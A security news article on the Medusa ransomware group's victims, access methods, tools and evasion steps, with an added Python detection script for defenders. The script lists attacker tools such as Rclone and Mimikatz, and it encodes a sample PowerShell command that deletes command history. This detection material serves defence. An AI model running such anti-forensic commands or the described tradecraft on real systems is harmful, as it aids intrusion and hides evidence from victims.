The threat actors behind the Medusa ransomware have claimed nearly 400 victims since it first emerged in January 2023, with the financially motivated attacks witnessing a 42% increase between 2023 and 2024.

In the first two months of 2025 alone, the group has claimed over 40 attacks, according to data from the Symantec Threat Hunter Team shared with The Hacker News. The cybersecurity company is tracking the cluster under the name Spearwing.

"Like the majority of ransomware operators, Spearwing and its affiliates carry out double extortion attacks, stealing victims' data before encrypting networks in order to increase the pressure on victims to pay a ransom," Symantec noted.


"If victims refuse to pay, the group threatens to publish the stolen data on their data leaks site."

While other ransomware-as-a-service (RaaS) players like RansomHub (aka Greenbottle and Cyclops), Play (aka Balloonfly), and Qilin (aka Agenda, Stinkbug, and Water Galura) have benefited from the disruptions of LockBit and BlackCat, the spike in Medusa infections raises the possibility that the threat actor could also be rushing in to fill the gap left by the two prolific extortionists.

The development comes as the ransomware landscape continues to be in a state of flux, with a steady stream of new RaaS operations, such as Anubis, CipherLocker, Core, Dange, LCRYX, Loches, Vgod, and Xelera, emerging in the wild in recent months.

Medusa has a track record of demanding ransoms anywhere between $100,000 and $15 million from healthcare providers and non-profits, as well as financial and government organizations.

Attack chains mounted by the ransomware syndicate involve the exploitation of known security flaws in public-facing applications, mainly Microsoft Exchange Server, to obtain initial access. The threat actors are also suspected of using initial access brokers to breach networks of interest.

Once a foothold is established, the hackers deploy remote management and monitoring (RMM) software such as SimpleHelp, AnyDesk, or MeshAgent for persistent access, and employ the tried-and-tested Bring Your Own Vulnerable Driver (BYOVD) technique to terminate antivirus processes using KillAV. It's worth pointing out that KillAV has previously been put to use in BlackCat ransomware attacks.

"The use of the legitimate RMM software PDQ Deploy is another hallmark of Medusa ransomware attacks," Symantec said. "It is typically used by the attackers to drop other tools and files and to move laterally across the victim network."

Some of the other tools deployed over the course of a Medusa ransomware attack include Navicat to access and run database queries, RoboCopy, and Rclone for data exfiltration.

"Like most targeted ransomware groups, Spearwing tends to attack large organizations across a range of sectors," Symantec said. "Ransomware groups tend to be driven purely by profit, and not by any ideological or moral considerations."

CISA Releases Medusa Advisory

In a joint cybersecurity bulletin released on March 12, 2025, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) noted that Medusa actors have claimed over 300 victims from critical infrastructure sectors as of December 2024.

Impacted industries include medical, education, legal, insurance, technology, and manufacturing. Medusa, the FBI added, is unrelated to the MedusaLocker variant and the Medusa mobile malware variant.

According to the agencies, the RaaS operation was first identified in June 2021, initially as a closed ransomware variant before switching to an affiliate-based model by recruiting outside members to conduct the double extortion attacks. However, crucial aspects such as ransom negotiation are said to be still overseen by the developers.

"Medusa actors use common techniques like phishing campaigns and exploiting unpatched software vulnerabilities," the alert said. The exploited flaws relate to ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet EMS (CVE-2023-48788).


The threat actors have been observed using legitimate tools like Advanced IP Scanner, SoftPerfect Network Scanner, and remote access software, as well as other living-off-the-land (LotL) techniques, to perform reconnaissance, discovery, and lateral movement activities. The attacks are also characterized by various steps to evade detection:

  • Deleting PowerShell command line history
  • Using tunneling tools to kill or delete endpoint detection and response (EDR) tools
  • Using tunneling tools like Ligolo and Cloudflared to support command-and-control (C2)

"After paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the 'true decryptor' – potentially indicating a triple extortion scheme," per the bulletin.

According to anti-ransomware and cyber resilience platform Halcyon, Medusa has emerged as one of the key frontrunners during the fourth quarter of 2024. The company also described it as a consistent threat group that has intensified its ransomware campaigns late in the year.

"Once inside a network, Medusa employs sophisticated strategies to maximize impact," Jon Miller, CEO and co-founder of Halcyon, said in a statement shared with The Hacker News. "The group executes Base64-encrypted commands via PowerShell to avoid detection and utilizes tools like Mimikatz to extract credentials from memory, facilitating further network compromise."

"They also leverage legitimate remote access software, including AnyDesk and ConnectWise, as well as tools like PsExec and RDP, to propagate across the network. The ransomware can terminate over 200 Windows services and processes, including those related to security software, to facilitate encryption."
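The tooling and evasion steps described in the Symantec and CISA reporting above (PDQ Deploy, Rclone and the RMM agents, PSReadLine history deletion, Ligolo and Cloudflared tunnels, Base64-encoded PowerShell) can be turned into a simple process-event triage rule for defenders. The following Python is an added example, not code from the article, Symantec, CISA or Halcyon; the event format and the sample command lines are constructed, and tools are matched on the image file name alone, so a hit is a hunting lead rather than a verdict.

```python
import base64
import re

# Tools named in the reporting; several are legitimate admin tools, so a hit is a lead, not proof.
WATCHED_TOOLS = {
    "rclone.exe": "exfiltration", "robocopy.exe": "exfiltration",
    "anydesk.exe": "rmm", "meshagent.exe": "rmm", "simplehelp": "rmm",
    "pdqdeploy": "lateral-movement", "psexec.exe": "lateral-movement",
    "ligolo": "tunneling", "cloudflared.exe": "tunneling",
    "mimikatz.exe": "credential-access", "navicat.exe": "database-access",
}
# PSReadLine's command history file; deleting it is the anti-forensic step listed in the advisory.
PSREADLINE_HISTORY = "consolehost_history.txt"
# powershell.exe accepts -e/-en/-enc/-EncodedCommand followed by Base64 of UTF-16LE script text.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the line has none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(event):
    """Findings for one process-creation event: a dict with 'image' and 'cmdline'."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    findings = [f"{cat}: {tool}" for tool, cat in WATCHED_TOOLS.items() if tool in image]
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        findings.append("encoded-powershell")
    if PSREADLINE_HISTORY in (decoded or event["cmdline"]).lower():  # check the decoded script too
        findings.append("history-deletion")
    return findings

def scan(events):
    """Map event index -> findings for every event that triggered at least one rule."""
    return {i: f for i, ev in enumerate(events) if (f := analyze_event(ev))}

def _enc(script):  # builds the constructed sample the way -enc expects it
    return base64.b64encode(script.encode("utf-16le")).decode()

# Constructed sample events (not taken from any real incident).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         r"Remove-Item $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt")},
    {"image": r"C:\Users\Public\rclone.exe", "cmdline": r"rclone.exe copy D:\Finance remote:bucket"},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]
```

Running `scan(SAMPLE_EVENTS)` flags the encoded history-deletion command and the Rclone copy while leaving the Notepad launch untouched; in practice the rule would be fed from Sysmon or EDR process-creation telemetry rather than an inline list.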

To avoid falling victim to Medusa, organizations are recommended to store multiple copies of sensitive and/or proprietary data in an air-gapped location, enforce network segmentation to prevent lateral movement, implement multi-factor authentication, and keep software and systems up-to-date.

(The story was updated after publication to include details of a CISA advisory about Medusa ransomware.)
